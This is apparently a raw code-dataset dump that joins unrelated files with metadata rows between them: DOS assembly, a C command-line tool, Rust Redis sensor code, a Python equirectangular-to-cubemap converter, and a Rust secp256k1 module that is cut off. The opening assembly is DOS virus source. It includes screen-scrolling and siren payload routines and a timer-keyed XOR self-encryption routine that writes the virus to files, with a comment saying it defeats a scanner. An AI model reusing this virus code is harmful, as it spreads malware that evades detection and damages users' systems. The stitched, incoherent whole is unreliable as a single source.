push bx ; Put Duration on stack
call Beep ; Make a noise
mov ax, 660 ; Freq
mov bx, 500 ; Duration = 1/5 second
push ax ; Put Freq on stack
push bx ; Put Duration on stack
call Beep ; Make more noise
pop cx ; Restore the count
loop KeepGoing ; So we can keep going
ret
Siren endp
; -----------------------------------------------------------------------------
; ds:si points to the null terminated string to print
; dx has row/col - dh=row
WriteStr proc near
mov bh,0 ; We'll be working on page 0
WriteMore:
mov al,[si] ; get the next character to print
cmp al, 0 ; done yet?
jz WriteDone ; Yep, so quit
inc si ; si++
mov ah,2 ; locate cursor at dx
int 10h ; do it
push cx ; save it for later
mov cx,1 ; count of characters to write!
mov ah,10 ; subfunction 10
int 10h ; call bios to do our dirty work
pop cx ; get it back
inc dx ; move to next cursor position
jmp short WriteMore ; keep going for cx
WriteDone:
ret
WriteStr endp
; -----------------------------------------------------------------------------
DrawFrame proc near
push bp ; Work around a stoopid bug in PC/XTs
mov ax, 0600h ; Draw and clear the outer frame
push ax ; Save for later
mov cx, 050Ah ; Upper screen coords: CH = ROW
mov dx, 0D46h ; Lower bounds, DH = ROW
mov bh, 70h ; Color is White Background, Black fore
int 10h ; Do It.
pop ax ; Draw and clear the inner frame
mov cx, 060Ch ; Upper screen coords: CH = ROW
mov dx, 0C44h ; Lower bounds, DH = ROW
mov bh, 0Eh ; Color is Black Background, Yellow fore
int 10h ; Do It Again
pop bp ; End of stoopid fix
ret
DrawFrame endp
; =============================================================================
ScrollRight proc near
push bp
mov bp, sp
mov ax, [bp+4] ; calc ColsToMove <- LEN shl 1
shl ax, 1 ; multiply by 2
mov ColsToMove, ax ; And save it
mov bx, NumCols ; calc WordsToScroll <- NumCols - LEN
sub bx, ax ; adjust for scroll difference
inc bx ; BX = WordsToScroll
mov ax, VidSegment ; Put ES = Video Segment
mov es, ax
xor ax, ax ; Start on row 0 aka 1
sr_NextRow:
push ax ; Save for later
mul LineWidth ; AX now has ROW * LineWidth
push ax ; Save start of row offset for printing
add ax, LineWidth ; AX points to last byte of the row
sub ax, ColsToMove ; This moves back 1 LEN of ch/attr pairs
mov di, ax ; save in DEST
sub ax, ColsToMove ; AX now moves back another LEN pairs
mov si, ax ; save in SOURCE
mov cx, bx ; BX = Words to Scroll
push ds ; Stash this
push es ; Make DS = ES
pop ds ; Like this
std ; Set SI and DI to decrement
rep movsw
pop ds ; Get the DS back
pop di ; Grab the Source Offset we saved above
mov cx, [bp+4] ; Prepare to print LEN blanks
call PrintBlank
pop ax ; Saved row
inc ax ; Move to next row
cmp ax, 25 ; Done with all rows?
jne sr_NextRow ; No? Then do next row!
mov sp, bp
pop bp
ret 2
ScrollRight endp
; -----------------------------------------------------------------------------
ScrollLeft proc near
push bp
mov bp, sp
mov ax, [bp+4] ; calc ColsToMove := Len Shl 1
shl ax, 1
mov ColsToMove, ax
mov bx, NumCols ; calc WordsToScroll := pred(NumCols) shl 1
mov ax, VidSegment ; Make ES point to the video segment
mov es, ax
mov es, ax
xor ax, ax ; Start on row 0 aka 1
sl_NextRow:
push ax ; Save Row for later
mul LineWidth ; calc AX := Row * LineWidth
push ax ; Save Start of Line
mov di, ax ; This is where it's going
add ax, ColsToMove ; calc AX := AX + ColsToMove
mov si, ax ; This will be our source
push ds ; Stash for later ...
push es ; Make DS = ES = Video Segment
pop ds
mov cx, bx ; BX = Words To Scroll
cld ; Set SI and DI to decrement
rep movsw
pop ds ; Get our DS back...
pop di ; Grab the Source Offset we saved
add di, LineWidth
sub di, colsToMove
mov cx, [bp+4] ; Prepare to print some blanks
call PrintBlank ; Do It
pop ax ; Get back out row value
inc ax ; And move to next row
cmp ax, 25 ; first check if we are done
jne sl_NextRow ; If now, then do next row
mov sp, bp
pop bp
ret 2
ScrollLeft endp
; -----------------------------------------------------------------------------
; In AH = 6 scroll up
; = 7 scroll down
Scroll proc near
mov al, 1 ; We will always scroll 1 line
xor cx, cx ; Set Top Row/Col to (0,0)
mov dx, 184Fh ; Set Bottom Row/Col to (24,79)
mov bh, 07h ; Use a normal blank
push bp ; Work around a lame bug on PC/XTs
int 10h ; Do Bios...Oh Do Me Now
pop bp ; And continue fixing that st00pid bug
ret ; I really feel sill doc'g this routine...
Scroll endp
; -----------------------------------------------------------------------------
PrintBlank proc near
; In ES - Video Segment
; DI - Offset to print blank at
; CX - Number of blanks to print
cld ; store forward (increment DI)
mov al,' ' ; We want to print a blank
PrintAgain:
stosb ; put in one blank char
inc di ; skip video attribute
loop short PrintAgain
ret
PrintBlank endp
; -----------------------------------------------------------------------------
; All the routines dealing with Sound and Delays - especially the delay
; calibration routine were mostly stolen from Kim Kokkonen's code in earlier
; version of Turbo Professional. KK is the owner of Turbo Power - a damn good
; set of programming tools - plug plug!
; Beep(Hz, MS:Word); assembler;
Beep proc near
push bp
mov bp, sp
mov bx, [bp+6] ; hertz
mov AX,34DDH
mov DX,0012H
cmp DX,BX
jnc beepStop
div BX
mov BX,AX ; Lots of port tweaking... Isn't
in AL,61H ; this shit fun???
test AL,3
jnz @99
or AL,3
out 61H,AL
mov AL,0B6H
out 43H,AL
@99:
mov AL,BL ; I know I never get bored.!!
out 42H,AL
mov AL,BH
out 42H,AL
BeepStop:
mov CX, [bp+4] ; push ms delay time
call Delay ; and wait...
IN AL, 61h ; Now turn off the speaker
AND AL, 0FCh
out 061h, AL
mov sp, bp
pop bp
ret 4
Beep endp
; -----------------------------------------------------------------------------
; In: cx = delay in ms
Delay proc near
delay1: ; What's to say... a tight loop
call delayOneMS ; counting milliseconds
loop short delay1
ret
Delay endp
; =============================================================================
DelayOneMS proc near
push cx ; Save CX
mov cx, OneMS ; Loop count into CX
DelayOne1:
loop delayOne1 ; Wait one millisecond
pop cx ; Restore CX
ret
DelayOneMs endp
; -----------------------------------------------------------------------------
Calibrate_Delay proc near
mov ax,40h
mov es,ax
mov di,6Ch ; ES:DI is the low word of BIOS timer count
mov OneMS, 55 ; Initial value for One MS's time
xor dx,dx ; DX = 0
mov ax,es:[di] ; AX = low word of timer
CalKeepOn:
cmp ax,es:[di] ; Keep looking at low word of timer
je CalKeepOn ; until its value changes...
mov ax,es:[di] ; ...then save it
CalDoMore:
call DelayOneMs ; Delay for a count of OneMS (55)
inc dx ; Increment loop counter
cmp ax,es:[di] ; Keep looping until the low word...
je CalDoMore ; ...of the timer count changes again
mov OneMS, dx ; DX has new OneMS }
ret
Calibrate_Delay endp
; -----------------------------------------------------------------------------
InitCrt proc near
mov ah,15 ; Get Video Mode
int 10h
cmp al, 7 ; Check if this is monochrome
je DoneInit
add VidSegment, 800h
DoneInit:
mov byte ptr NumCols, ah ; Set the number of Character Cols
shl ah, 1 ; Mult by two for number of vid bytes
mov byte ptr LineWidth, ah ; And stash it...
ToneInit:
call Calibrate_Delay
ret
InitCrt endp
; =============================================================================
VidSegment dw 0B000h ; Base Video Segment
NumCols dw ? ; Columns on Screen
LineWidth dw ? ; NumCols * 2
ColsToMove dw ? ; Number of video bytes to move each time
OneMS dw ? ; Calibration value for 1 ms of time
; =============================================================================
encrypt_code proc near
mov si,offset encrypt_decrypt; SI points to cipher routine
xor ah,ah ; BIOS get time function
int 01Ah
mov word ptr [si + 9],dx ; Low word of timer is new key
xor byte ptr [si],1 ;
xor byte ptr [si + 8],1 ; Change all SIs to DIs
xor word ptr [si + 11],0101h; (and vice-versa)
mov di,offset finish ; Copy routine into heap
mov cx,finish - encrypt_decrypt - 1 ; All but final RET
push si ; Save SI for later
push cx ; Save CX for later
rep movsb ; Copy the bytes
mov si,offset write_stuff ; SI points to write stuff
mov cx,5 ; CX holds length of write
rep movsb ; Copy the bytes
pop cx ; Restore CX
pop si ; Restore SI
inc cx ; Copy the RET also this time
rep movsb ; Copy the routine again
mov ah,040h ; DOS write to file function
mov dx,offset start ; DX points to virus
call finish ; Encrypt/write/decrypt
ret ; Return to caller
write_stuff: mov cx,finish - start ; Length of code
int 021h
encrypt_code endp
end_of_code label near
; -----------------------------------------------------------------------------
encrypt_decrypt proc near
mov si,offset start_of_code ; SI points to code to decrypt
nop ; Defeat SCAN 95B
mov cx,(end_of_code - start_of_code) / 2 ; CX holds length
xor_loop: db 081h,034h,00h,00h ; XOR a word by the key
inc si ; Do the next word
inc si ;
loop xor_loop ; Loop until we're through
ret ; Return to caller
encrypt_decrypt endp
finish label near
code ends
end main
| 41.678322 | 81 | 0.429228 | 3.046875 |
b1b339ac49e786ddbd73ce87153a846968bed309 | 2,925 | c | C | cli_main.c | DoubleDensity/Orca-c | 86dd6be4f4edc4fadf253eba3a7baded145cdef5 | [
"MIT"
] | null | null | null | cli_main.c | DoubleDensity/Orca-c | 86dd6be4f4edc4fadf253eba3a7baded145cdef5 | [
"MIT"
] | null | null | null | cli_main.c | DoubleDensity/Orca-c | 86dd6be4f4edc4fadf253eba3a7baded145cdef5 | [
"MIT"
] | null | null | null | #include "bank.h"
#include "base.h"
#include "field.h"
#include "mark.h"
#include "sim.h"
#include <getopt.h>
static void usage(void) {
// clang-format off
fprintf(stderr,
"Usage: cli [options] infile\n\n"
"Options:\n"
" -t <number> Number of timesteps to simulate.\n"
" Must be 0 or a positive integer.\n"
" Default: 1\n"
" -h or --help Print this message and exit.\n"
);
// clang-format on
}
int main(int argc, char** argv) {
static struct option cli_options[] = {{"help", no_argument, 0, 'h'},
{NULL, 0, NULL, 0}};
char* input_file = NULL;
int ticks = 1;
for (;;) {
int c = getopt_long(argc, argv, "t:h", cli_options, NULL);
if (c == -1)
break;
switch (c) {
case 't':
ticks = atoi(optarg);
if (ticks == 0 && strcmp(optarg, "0")) {
fprintf(stderr,
"Bad timestep argument %s.\n"
"Must be 0 or a positive integer.\n",
optarg);
return 1;
}
break;
case 'h':
usage();
return 0;
case '?':
usage();
return 1;
}
}
if (optind == argc - 1) {
input_file = argv[optind];
} else if (optind < argc - 1) {
fprintf(stderr, "Expected only 1 file argument.\n");
usage();
return 1;
}
if (input_file == NULL) {
fprintf(stderr, "No input file.\n");
usage();
return 1;
}
if (ticks < 0) {
fprintf(stderr, "Time must be >= 0.\n");
usage();
return 1;
}
Field field;
field_init(&field);
Field_load_error fle = field_load_file(input_file, &field);
if (fle != Field_load_error_ok) {
field_deinit(&field);
char const* errstr = "Unknown";
switch (fle) {
case Field_load_error_ok:
break;
case Field_load_error_cant_open_file:
errstr = "Unable to open file";
break;
case Field_load_error_too_many_columns:
errstr = "Grid file has too many columns";
break;
case Field_load_error_too_many_rows:
errstr = "Grid file has too many rows";
break;
case Field_load_error_no_rows_read:
errstr = "Grid file has no rows";
break;
case Field_load_error_not_a_rectangle:
errstr = "Grid file is not a rectangle";
break;
}
fprintf(stderr, "File load error: %s.\n", errstr);
return 1;
}
Mbuf_reusable mbuf_r;
mbuf_reusable_init(&mbuf_r);
mbuf_reusable_ensure_size(&mbuf_r, field.height, field.width);
Oevent_list oevent_list;
oevent_list_init(&oevent_list);
Usz max_ticks = (Usz)ticks;
for (Usz i = 0; i < max_ticks; ++i) {
orca_run(field.buffer, mbuf_r.buffer, field.height, field.width, i,
&oevent_list, ORCA_PIANO_BITS_NONE);
}
mbuf_reusable_deinit(&mbuf_r);
oevent_list_deinit(&oevent_list);
field_fput(&field, stdout);
field_deinit(&field);
return 0;
}
| 25.434783 | 71 | 0.579487 | 3.1875 |
3d60ad7843a4d9704383b7fa3a512ba724484fbd | 8,189 | rs | Rust | services/sensor_tracker/src/predis.rs | Terkwood/prawnalith | fda255912eee8f7caff185b3507bdf052c9420d8 | [
"Apache-2.0",
"MIT"
] | 16 | 2018-11-06T09:31:55.000Z | 2021-07-01T15:14:41.000Z | services/sensor_tracker/src/predis.rs | Terkwood/prawnalith | fda255912eee8f7caff185b3507bdf052c9420d8 | [
"Apache-2.0",
"MIT"
] | 50 | 2018-10-05T12:55:50.000Z | 2020-05-23T15:15:37.000Z | services/sensor_tracker/src/predis.rs | Terkwood/prawnalith | fda255912eee8f7caff185b3507bdf052c9420d8 | [
"Apache-2.0",
"MIT"
] | null | null | null | use redis::Commands;
use super::model;
use redis_context::RedisContext;
use redis_delta::REvent;
use serde_json;
use std::time::SystemTime;
use uuid::Uuid;
/// Updates redis so that the individual measurement is applied to the correct tank.
/// Also records the measurement to a record associated with the sensor itself.
/// Keeps track of how many updates have been applied to each tank and sensor record.
/// Will create a new sensor record for this device if one does not already exist.
pub fn update<'a, 'b>(
redis_ctx: &RedisContext,
measure: &model::Measurement,
ext_device_id: &str,
) -> Result<Vec<REvent>, redis::RedisError> {
let mut delta_events: Vec<REvent> = vec![];
println!("Received redis {} update: {:?}", measure.name(), measure);
let ext_device_namespace = &redis_ctx.get_external_device_namespace(measure.name())?;
let device_id = internal_device_id(ext_device_id, ext_device_namespace).unwrap();
println!("\tDevice ID (internal): {}", device_id);
let rn = &redis_ctx.namespace;
let sensor_set_event = update_sensor_set(redis_ctx, rn, measure, device_id);
if let Some(e) = sensor_set_event {
delta_events.push(e)
}
// lookup associated tank
let sensor_hash_key = &format!("{}/sensors/{}/{}", rn, measure.name(), device_id).to_string();
let tank_and_area_and_update_count: Result<Vec<Option<u64>>, _> = redis_ctx.conn.hget(
sensor_hash_key,
vec!["tank", "area", &format!("{}_update_count", measure.name())],
);
if let Ok(v) = tank_and_area_and_update_count {
// Tank associated with this sensor?
let revent = match (v.get(0).unwrap_or(&None), v.get(1).unwrap_or(&None)) {
(Some(tank_num), _) => {
update_container_hash(redis_ctx, Container::Tanks, tank_num, &measure)
}
(_, Some(area_num)) => {
update_container_hash(redis_ctx, Container::Areas, area_num, &measure)
}
(None, None) => ensure_sensor_hash_exists(redis_ctx, sensor_hash_key, ext_device_id),
};
if let Some(ev) = revent {
delta_events.push(ev)
}
// record a hit on the updates that the sensor has seen
// and also record the most recent measurement on the record
// for this individual sensor
let sensor_updated = update_sensor_hash(
redis_ctx,
sensor_hash_key,
measure,
v.get(2).unwrap_or(&None),
);
if let Some(ev) = sensor_updated {
delta_events.push(ev)
}
};
Ok(delta_events)
}
fn update_sensor_set(
redis_ctx: &RedisContext,
rn: &str,
measure: &model::Measurement,
device_id: Uuid,
) -> Option<REvent> {
let set_sensor_type_key = format!("{}/sensors/{}", rn, measure.name());
// add to the member set if it doesn't already exist
let sensors_added: Result<u64, _> = redis_ctx
.conn
.sadd(&set_sensor_type_key, &format!("{}", device_id));
match sensors_added {
Ok(n) if n > 0 => Some(REvent::SetUpdated {
key: set_sensor_type_key,
}),
_ => None,
}
}
enum Container {
Tanks,
Areas,
}
impl Container {
pub fn to_string(self) -> String {
match self {
Container::Tanks => "tanks".to_string(),
Container::Areas => "areas".to_string(),
}
}
}
fn update_container_hash(
redis_ctx: &RedisContext,
container: Container,
container_num: &u64,
measure: &model::Measurement,
) -> Option<REvent> {
// We found the area associated with this
// sensor ID, so we should update that area's
// current reading.
let container_key = format!(
"{}/{}/{}",
redis_ctx.namespace,
container.to_string(),
container_num
);
let container_measure_count: Result<Option<u32>, _> = redis_ctx
.conn
.hget(&container_key, &format!("{}_update_count", measure.name()));
let uc_name = format!("{}_update_count", measure.name());
let ut_name = format!("{}_update_time", measure.name());
let update: (Result<String, _>, Vec<&str>) = {
let mut data: Vec<(&str, String)> = measure.to_redis();
data.push((
&uc_name,
container_measure_count
.unwrap_or(None)
.map(|u| u + 1)
.unwrap_or(1)
.to_string(),
));
data.push((&ut_name, epoch_secs().to_string()));
(
redis_ctx.conn.hset_multiple(&container_key, &data[..]),
data.iter().map(|(a, _)| *a).collect(),
)
};
match update {
(Err(e), _) => {
println!("update fails for {}: {:?}", container_key, e);
None
}
(Ok(_), fields) if fields.len() > 0 => {
let fs = fields.iter().map(|s| s.to_string()).collect();
Some(REvent::HashUpdated {
key: container_key.to_string(),
fields: fs,
})
}
_ => None,
}
}
fn ensure_sensor_hash_exists(
redis_ctx: &RedisContext,
sensor_hash_key: &str,
ext_device_id_str: &str,
) -> Option<REvent> {
// We know that there's no associated "tank"
// field for this key. Let's make sure the record
// for this sensor exists -- we'll need a human
// to come in and link this device to a specific tank
// using redis-cli!
let mut result: Option<REvent> = None;
redis_ctx
.conn
.exists(sensor_hash_key)
.iter()
.for_each(|e: &bool| {
if !e {
let cf = "create_time".to_string();
let ed = "ext_device_id".to_string();
let field_vals = &vec![
(&cf, format!("{}", epoch_secs())),
(&ed, ext_device_id_str.to_string()),
][..];
// new sensor, make note of when it is created
let _: Result<Vec<bool>, _> =
redis_ctx.conn.hset_multiple(sensor_hash_key, field_vals);
let fields = vec![cf, ed];
result = Some(REvent::HashUpdated {
key: sensor_hash_key.to_string(),
fields,
})
}
});
result
}
fn update_sensor_hash(
redis_ctx: &RedisContext,
sensor_hash_key: &str,
measure: &model::Measurement,
maybe_sensor_upd_count: &Option<u64>,
) -> Option<REvent> {
let upd_c = &format!("{}_update_count", measure.name());
let mut data: Vec<(&str, String)> = vec![(
upd_c,
maybe_sensor_upd_count
.map(|u| u + 1)
.unwrap_or(1)
.to_string(),
)];
data.extend(measure.to_redis());
let ut = &format!("{}_update_time", measure.name());
data.push((ut, epoch_secs().to_string()));
let redis_result: Result<(), _> = redis_ctx.conn.hset_multiple(sensor_hash_key, &data[..]);
if let Err(e) = redis_result {
println!("couldn't update sensor record {}: {:?}", sensor_hash_key, e);
None
} else {
let mut fields: Vec<String> = vec![];
data.iter().for_each(|(f, _)| fields.push(f.to_string()));
Some(REvent::HashUpdated {
key: sensor_hash_key.to_string(),
fields,
})
}
}
fn internal_device_id(
external_device_id: &str,
external_device_namespace: &Uuid,
) -> Result<Uuid, uuid::parser::ParseError> {
Ok(Uuid::new_v5(
&external_device_namespace,
external_device_id.as_bytes(),
))
}
fn epoch_secs() -> u64 {
SystemTime::now()
.duration_since(SystemTime::UNIX_EPOCH)
.unwrap()
.as_secs()
}
pub fn publish_updates(redis_ctx: &RedisContext, topic: &str, updates: Vec<REvent>) {
updates.iter().for_each(|delta_event| {
if let Ok(s) = serde_json::to_string(delta_event) {
let published: Result<u64, _> = redis_ctx.conn.publish(topic, s);
if let Err(e) = published {
println!("Error publishing to {}: {}", topic, e)
}
}
})
}
| 30.785714 | 98 | 0.571743 | 3.28125 |
f07f1c21b8f06d89cde1866e0e0a9e2404549ae4 | 10,586 | py | Python | src/python/vrprim/photosphere/conv.py | cmbruns/vr_samples | 8dee056766bccca1a602c6dd58fd0a641c5033a5 | [
"MIT"
] | 1 | 2017-01-29T21:15:23.000Z | 2017-01-29T21:15:23.000Z | src/python/vrprim/photosphere/conv.py | cmbruns/vr_samples | 8dee056766bccca1a602c6dd58fd0a641c5033a5 | [
"MIT"
] | 2 | 2017-01-29T20:34:39.000Z | 2017-01-29T23:26:05.000Z | src/python/vrprim/photosphere/conv.py | cmbruns/vr_samples | 8dee056766bccca1a602c6dd58fd0a641c5033a5 | [
"MIT"
] | null | null | null | """
Convert spherical panorama in equirectangular format into cubemap format
"""
from math import pi, log2
import numpy
from libtiff import TIFF
import png
import glfw
from OpenGL import GL
from OpenGL.GL import shaders
from OpenGL.GL.EXT.texture_filter_anisotropic import GL_MAX_TEXTURE_MAX_ANISOTROPY_EXT, GL_TEXTURE_MAX_ANISOTROPY_EXT
from PIL import Image
class Converter(object):
def render_scene(self):
GL.glClear(GL.GL_COLOR_BUFFER_BIT)
GL.glUseProgram(self.shader)
equirect_loc = GL.glGetUniformLocation(self.shader, "equirect")
GL.glUniform1i(equirect_loc, 0)
GL.glDrawArrays(GL.GL_TRIANGLE_STRIP, 0, 4)
def cube_from_equirect(self, arr):
"""
Use OpenGL to efficiently warp an equirectangular image into
a single cubemap image
"""
# Set up glfw
eh = arr.shape[0]
ew = arr.shape[1]
print(ew, eh)
# Cubemap has same width, and height * 1.5, right? todo:
scale = 4.0 / pi # tan(a)/a [a == 45 degrees] # so cube face center resolution matches equirectangular equator resolution
# scale = 1.0
# scale *= 1.0 / 4.0 # optional: smaller for faster testing
tile_size = int(scale * ew / 4.0)
# optional: clip to nearest power of two subtile size
tile_size = int(pow(2.0, int(log2(tile_size))))
print("tile size = ", tile_size, " pixels")
cw = 4 * tile_size
ch = 3 * tile_size
print(cw, ch)
glfw.init()
glfw.window_hint(glfw.CONTEXT_VERSION_MAJOR, 4)
glfw.window_hint(glfw.CONTEXT_VERSION_MINOR, 5)
# glfw.window_hint(glfw.VISIBLE, False)
w = glfw.create_window(cw, ch, "Cubemap", None, None)
# Create a framebuffer and render cube_color_texture
glfw.make_context_current(w)
vao = GL.glGenVertexArrays(1)
GL.glBindVertexArray(vao)
fb = GL.glGenFramebuffers(1)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, fb)
cube_color_tex = GL.glGenTextures(1)
if arr.dtype == numpy.uint16:
gl_type = GL.GL_UNSIGNED_SHORT
cube_internal_format = GL.GL_RGBA16
input_internal_format = GL.GL_RGB16
elif arr.dtype == numpy.uint8:
gl_type = GL.GL_UNSIGNED_BYTE
cube_internal_format = GL.GL_RGBA8
input_internal_format = GL.GL_RGB8
else:
raise
GL.glBindTexture(GL.GL_TEXTURE_2D, cube_color_tex)
GL.glTexImage2D(GL.GL_TEXTURE_2D, 0, cube_internal_format, cw, ch, 0, GL.GL_RGBA, gl_type, None)
GL.glFramebufferTexture(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT0, cube_color_tex, 0)
GL.glDrawBuffers([GL.GL_COLOR_ATTACHMENT0,])
if GL.glCheckFramebufferStatus(GL.GL_FRAMEBUFFER) != GL.GL_FRAMEBUFFER_COMPLETE:
raise "Incomplete framebuffer"
else:
print("Framebuffer OK")
# Create shader program
vtx = shaders.compileShader("""#version 450
#line 62
out vec2 tex_coord;
const vec4 SCREEN_QUAD[4] = vec4[4](
vec4(-1, -1, 0.5, 1),
vec4( 1, -1, 0.5, 1),
vec4(-1, 1, 0.5, 1),
vec4( 1, 1, 0.5, 1));
void main() {
vec4 c = SCREEN_QUAD[gl_VertexID]; // corner location
gl_Position = c;
tex_coord = 0.5 * (c.xy + vec2(1));
}
""", GL.GL_VERTEX_SHADER)
frg = shaders.compileShader("""#version 450
#line 79
layout(binding=0) uniform sampler2D equirect;
in vec2 tex_coord;
out vec4 frag_color;
const float PI = 3.14159265359;
vec3 xyz_from_equirect(in vec2 eq) {
vec2 c = 2*eq - vec2(1); // centered
float lon = PI * c.x;
float lat = -0.5 * PI * c.y;
float s = cos(lat);
return vec3(s*sin(lon), sin(lat), -s*cos(lon));
}
vec2 equirect_from_xyz(in vec3 xyz) {
float r = length(xyz.xz);
float lat = atan(xyz.y, r);
float lon = atan(xyz.x, -xyz.z);
return 0.5 * (vec2(lon / PI, -2.0 * lat / PI) + vec2(1));
}
vec3 xyz_from_cube(in vec2 cube) {
if (cube.y > 2.0/3.0) { // lower strip
if (cube.x < 1.0/4.0) {
discard;
}
else if (cube.x > 2.0/4.0) {
discard;
}
else {
vec2 xy = (cube - vec2(3.0/8.0, 5.0/6.0)) * vec2(8, -6);
return normalize(vec3(xy.x, -1, -xy.y)); // bottom
}
}
else if (cube.y < 1.0/3.0) { // upper strip
if (cube.x < 1.0/4.0) {
discard;
}
else if (cube.x > 2.0/4.0) {
discard;
}
else { // top
vec2 xy = (cube - vec2(3.0/8.0, 1.0/6.0)) * vec2(8, -6);
return normalize(vec3(xy.x, 1, xy.y));
}
}
else { // central strip
if (cube.x < 0.25) {
vec2 xy = (cube - vec2(1.0/8.0, 0.5)) * vec2(8, -6);
return normalize(vec3(-1, xy.y, -xy.x)); // left
}
else if (cube.x < 0.50) { // front
vec2 xy = (cube - vec2(3.0/8.0, 0.5)) * vec2(8, -6);
return normalize(vec3(xy.x, xy.y, -1));
}
else if (cube.x < 0.75) { // right
vec2 xy = (cube - vec2(5.0/8.0, 0.5)) * vec2(8, -6);
return normalize(vec3(1, xy.y, xy.x));
}
else { // back
vec2 xy = (cube - vec2(7.0/8.0, 0.5)) * vec2(8, -6);
return normalize(vec3(-xy.x, xy.y, 1));
}
}
}
void main() {
vec3 xyz = xyz_from_cube(tex_coord);
vec2 eq = equirect_from_xyz(xyz);
// Use explicit level of detail to avoid seam at z==1, lon==PI
// Use explicit gradients, to preserve anisotropic filtering during mipmap lookup
vec2 dpdx = dFdx(eq);
if (dpdx.x > 0.5) dpdx.x -= 1; // use "repeat" wrapping on gradient
if (dpdx.x < -0.5) dpdx.x += 1;
vec2 dpdy = dFdy(eq);
frag_color = textureGrad(equirect, eq, dpdx, dpdy);
// frag_color = vec4(eq, 0.5, 1);
// frag_color = vec4(xyz, 1);
// frag_color = vec4(tex_coord, 1, 1);
// frag_color = vec4(xyz_from_equirect(tex_coord), 1);
}
""", GL.GL_FRAGMENT_SHADER)
self.shader = shaders.compileProgram(vtx, frg)
# Bind the input equirectangular image
equi_tex = GL.glGenTextures(1)
GL.glActiveTexture(GL.GL_TEXTURE0)
GL.glBindTexture(GL.GL_TEXTURE_2D, equi_tex)
GL.glTexImage2D(GL.GL_TEXTURE_2D, 0, input_internal_format, ew, eh, 0, GL.GL_RGB, gl_type, arr)
aniso = GL.glGetFloatv(GL_MAX_TEXTURE_MAX_ANISOTROPY_EXT)
GL.glTexParameterf(GL.GL_TEXTURE_2D, GL_TEXTURE_MAX_ANISOTROPY_EXT, aniso)
GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_WRAP_S, GL.GL_REPEAT);
GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_WRAP_T, GL.GL_MIRRORED_REPEAT);
GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAG_FILTER, GL.GL_LINEAR);
GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR_MIPMAP_LINEAR);
GL.glGenerateMipmap(GL.GL_TEXTURE_2D)
# init
GL.glDisable(GL.GL_BLEND)
GL.glDisable(GL.GL_DEPTH_TEST)
GL.glViewport(0, 0, cw, ch)
GL.glClearColor(0.5, 0.5, 0.5, 0.0)
# Render the image
bToScreen = False
if bToScreen:
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, 0)
# while not glfw.window_should_close(w):
for _ in range(100):
self.render_scene()
glfw.swap_buffers(w)
else:
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, fb)
self.render_scene()
GL.glFinish()
# fetch the rendered image
result = numpy.zeros(shape=(ch, cw, 4), dtype=arr.dtype)
GL.glReadPixels(0, 0, cw, ch, GL.GL_RGBA, gl_type, result)
print(cw, ch)
print(result.shape)
# print(result.shape)
# clean up
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, 0)
GL.glDeleteTextures([cube_color_tex,])
GL.glDeleteFramebuffers([fb,])
glfw.destroy_window(w)
glfw.terminate()
# raise NotImplementedError()
return result
def to_cube(arr):
w = arr.shape[0]
h = arr.shape[1]
aspect = w / h
if aspect == 2:
return Converter().cube_from_equirect(arr)
raise NotImplementedError()
def main(arr):
if (arr.dtype == numpy.float32):
# Clip data to percentile range with dynamic range below 65535
pct_low = 0
pct_high = 100
val_low, val_high = numpy.percentile(arr[numpy.nonzero(arr)], [pct_low, pct_high])
dynamic_range = val_high / val_low
eps = 0.07
while dynamic_range > 65535:
pct_low = eps
pct_high = 100.0 - eps
val_low, val_high = numpy.percentile(arr[numpy.nonzero(arr)], [pct_low, pct_high])
dynamic_range = val_high / val_low
print(pct_low, pct_high, val_low, val_high, dynamic_range)
eps *= 1.2
arr *= 65535.0 / val_high
arr[arr>65535] = 65535
arr[arr<0] = 0
# print(numpy.histogram(arr))
arr = arr.astype('uint16')
cube = Converter().cube_from_equirect(arr)
return cube
if __name__ == "__main__":
if True:
tif = TIFF.open('1w180.9.tiff', 'r')
arr = tif.read_image()
tif.close()
else:
jpeg = Image.open('_0010782_stitch2.jpg')
arr = numpy.array(jpeg)
cube = main(arr)
if cube.dtype == numpy.uint16:
img = png.from_array(cube, 'RGBA')
img.save('cube.png')
else:
Image.fromarray(cube).save('cube.jpg', quality=95)
| 38.919118 | 129 | 0.53344 | 3.3125 |
c3d3439acf75a13b35d9c365a0760bf92cb5962d | 2,026 | rs | Rust | secp256kfun/src/libsecp_compat.rs | delta1/secp256kfun | 89c19f60a2ca33de967b1896f52282898d930be5 | [
"0BSD"
] | null | null | null | secp256kfun/src/libsecp_compat.rs | delta1/secp256kfun | 89c19f60a2ca33de967b1896f52282898d930be5 | [
"0BSD"
] | null | null | null | secp256kfun/src/libsecp_compat.rs | delta1/secp256kfun | 89c19f60a2ca33de967b1896f52282898d930be5 | [
"0BSD"
] | null | null | null | use crate::{
marker::*,
secp256k1::{PublicKey, SecretKey, XOnlyPublicKey},
Point, Scalar, XOnly,
};
impl From<Scalar> for SecretKey {
fn from(scalar: Scalar) -> Self {
SecretKey::from_slice(scalar.to_bytes().as_ref()).unwrap()
}
}
impl From<SecretKey> for Scalar {
fn from(sk: SecretKey) -> Self {
Scalar::from_slice(&sk[..])
.unwrap()
.mark::<NonZero>()
.expect("SecretKey is never zero")
}
}
impl From<PublicKey> for Point {
fn from(pk: PublicKey) -> Self {
Point::from_bytes(pk.serialize()).unwrap()
}
}
impl<T: Normalized> From<Point<T>> for PublicKey {
fn from(pk: Point<T>) -> Self {
PublicKey::from_slice(pk.to_bytes().as_ref()).unwrap()
}
}
impl From<XOnlyPublicKey> for XOnly {
fn from(pk: XOnlyPublicKey) -> Self {
XOnly::from_bytes(pk.serialize()).unwrap()
}
}
impl From<XOnly> for XOnlyPublicKey {
fn from(xonly: XOnly) -> Self {
XOnlyPublicKey::from_slice(xonly.as_bytes()).unwrap()
}
}
impl From<Point<EvenY>> for XOnlyPublicKey {
fn from(point: Point<EvenY>) -> Self {
point.to_xonly().into()
}
}
impl From<XOnlyPublicKey> for Point<EvenY> {
fn from(pk: XOnlyPublicKey) -> Self {
XOnly::from(pk).to_point()
}
